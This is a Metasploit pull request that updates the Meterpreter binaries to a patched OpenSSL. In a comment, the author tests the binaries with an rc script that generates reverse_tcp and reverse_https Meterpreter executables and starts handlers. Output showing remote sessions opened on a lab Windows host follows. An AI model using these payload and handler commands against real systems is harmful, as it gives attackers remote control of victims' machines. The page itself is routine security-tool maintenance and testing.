Update meterpreter bins pr 86 #3423

Closed
wants to merge 2 commits into from


@todb-r7 todb-r7 commented Jun 5, 2014

This updates the Meterpreter bins to the current, non-vulnerable OpenSSL 0.9.8za. This is current as of commit c41bd24 from rapid7/meterpreter#86.

Verification

  • Ensure normal Meterpreter functionality

When landing this, please reference RM 8808 as well.
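
One way to check the outcome this pull request describes (binaries carrying OpenSSL 0.9.8za rather than an older 0.9.8 release), as an added example that is not part of the pull request or of Metasploit's code. It assumes the OpenSSL version banner is present as plain text in the binary; the function names and sample bytes are constructed for illustration.

```ruby
# Added example, not part of the pull request: list OpenSSL version banners
# embedded in a binary and compare them with a minimum release.

# Pre-1.1.0 OpenSSL versions are MAJOR.MINOR.FIX plus an optional patch
# letter: a..z, then za..zz, so 0.9.8y < 0.9.8z < 0.9.8za.
OPENSSL_VERSION_RE = /(\d+)\.(\d+)\.(\d+)(z[a-z]|[a-z])?/
BANNER = /OpenSSL (#{OPENSSL_VERSION_RE.source})\b/

# "0.9.8za" -> [0, 9, 8, 27]; arrays compare element by element with <=>.
def parse_version(text)
  m = /\A#{OPENSSL_VERSION_RE.source}\z/.match(text)
  raise ArgumentError, "not an OpenSSL version: #{text}" unless m
  letters = m[4].to_s
  patch = letters.empty? ? 0 : (letters.length - 1) * 26 + (letters[-1].ord - 96)
  [m[1].to_i, m[2].to_i, m[3].to_i, patch]
end

# Unique version strings found in banners anywhere in the raw bytes.
def embedded_openssl_versions(bytes)
  bytes.b.scan(BANNER).map(&:first).uniq
end

# Sort banners in the same MAJOR.MINOR.FIX branch as `minimum` into :stale
# and :ok; banners from other branches go to :other because the minimum
# says nothing about them.
def classify(bytes, minimum)
  min = parse_version(minimum)
  result = { stale: [], ok: [], other: [] }
  embedded_openssl_versions(bytes).each do |found|
    cur = parse_version(found)
    key = if cur[0, 3] != min[0, 3] then :other
          elsif (cur <=> min) < 0 then :stale
          else :ok
          end
    result[key] << found
  end
  result
end

# Constructed sample data standing in for File.binread(path) of a real binary.
OLD_BIN = "MZ\x90\x00\xFFOpenSSL 0.9.8y 5 Feb 2013\x00".b
NEW_BIN = "MZ\x90\x00\xFFOpenSSL 0.9.8za 5 Jun 2014\x00".b

if __FILE__ == $PROGRAM_NAME
  p classify(OLD_BIN, "0.9.8za")
  p classify(NEW_BIN, "0.9.8za")
end
```

A binary can embed more than one banner, so an empty `:stale` list together with a non-empty `:ok` list is the result to look for.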

Tod Beardsley added 2 commits June 5, 2014 16:48
Current binaries as of commit
c41bd249569874db1786d3a8ac93549bacea897e

Note that rapid7/meterpreter#86 should be landed as well.

See RM rapid7#8808

todb-r7 commented Jun 5, 2014

Binaries work for me. Using this rc script for basic functional testing:

sleep 3
use payload/windows/meterpreter/reverse_tcp
set LHOST 192.168.145.1
set LPORT 4432
generate -t exe -f /tmp/meterpreter32.exe

use payload/windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.145.1
set LPORT 4464
generate -t exe -f /tmp/meterpreter64.exe

use payload/windows/meterpreter/reverse_https
set LHOST 192.168.145.1
set LPORT 4832
generate -t exe -f /tmp/meterpreter32-https.exe

use payload/windows/x64/meterpreter/reverse_https
set LHOST 192.168.145.1
set LPORT 4864
generate -t exe -f /tmp/meterpreter64-https.exe

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.145.1
set LPORT 4432
set ExitOnSession false
exploit -j

set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LPORT 4464
exploit -j

set PAYLOAD windows/x64/meterpreter/reverse_https
set LPORT 4864
exploit -j

set PAYLOAD windows/meterpreter/reverse_https
set LPORT 4832
exploit -j

Gets results

[*] Started HTTPS reverse handler on https://0.0.0.0:4832/
[*] Starting the payload handler...
[*] 192.168.145.149:49713 Request received for /z3Kj_APFOuUHbX8YUzSNU/...
[*] Incoming orphaned session z3Kj_APFOuUHbX8YUzSNU, reattaching...
[*] 192.168.145.149:49714 Request received for /bbOO_C39J2vPJM3g201Xx/...
[*] Incoming orphaned session bbOO_C39J2vPJM3g201Xx, reattaching...
[*] Meterpreter session 1 opened (192.168.145.1:4864 -> 192.168.145.149:49713) at 2014-06-05 17:03:35 -0500
[*] Meterpreter session 2 opened (192.168.145.1:4832 -> 192.168.145.149:49714) at 2014-06-05 17:03:35 -0500

msf exploit(handler) > 
[*] Sending stage (972800 bytes) to 192.168.145.149
[*] Meterpreter session 3 opened (192.168.145.1:4464 -> 192.168.145.149:49818) at 2014-06-05 17:03:49 -0500
[*] Sending stage (770048 bytes) to 192.168.145.149
[*] Meterpreter session 4 opened (192.168.145.1:4432 -> 192.168.145.149:49823) at 2014-06-05 17:03:51 -0500

msf exploit(handler) > sessions -i

Active sessions
===============

  Id  Type                   Information                                      Connection
  --  ----                   -----------                                      ----------
  1   meterpreter x64/win64  WIN-5OCH6LK7RTG\Tod Beardsley @ WIN-5OCH6LK7RTG  192.168.145.1:4864 -> 192.168.145.149:49713 (192.168.145.149)
  2   meterpreter x86/win32  WIN-5OCH6LK7RTG\Tod Beardsley @ WIN-5OCH6LK7RTG  192.168.145.1:4832 -> 192.168.145.149:49714 (192.168.145.149)
  3   meterpreter x64/win64  WIN-5OCH6LK7RTG\Tod Beardsley @ WIN-5OCH6LK7RTG  192.168.145.1:4464 -> 192.168.145.149:49818 (192.168.145.149)
  4   meterpreter x86/win32  WIN-5OCH6LK7RTG\Tod Beardsley @ WIN-5OCH6LK7RTG  192.168.145.1:4432 -> 192.168.145.149:49823 (192.168.145.149)


todb-r7 commented Jun 5, 2014

Other commands work as well, just FYI, not just session establishment. Normal things like getuid, etc.

todb-r7 pushed a commit to todb-r7/metasploit-framework that referenced this pull request Jun 5, 2014
This contains the same bins as rapid7#3423, but it is targeted at the release
branch for rapid7/metasploit-framework.
@Meatballs1
Contributor

Worthwhile exercising some commands?

test/modules/post/test/meterpreter.rb

bturner-r7 added a commit that referenced this pull request Jun 5, 2014
Updates meterpreter bins and closes #3425 and #3423.
@bturner-r7
Contributor

This was landed by merging release into master after landing #3425.

@bturner-r7 bturner-r7 closed this Jun 5, 2014

todb-r7 commented Jun 6, 2014

@Meatballs1 thanks for the pointer to the test script -- totally forgot about that!
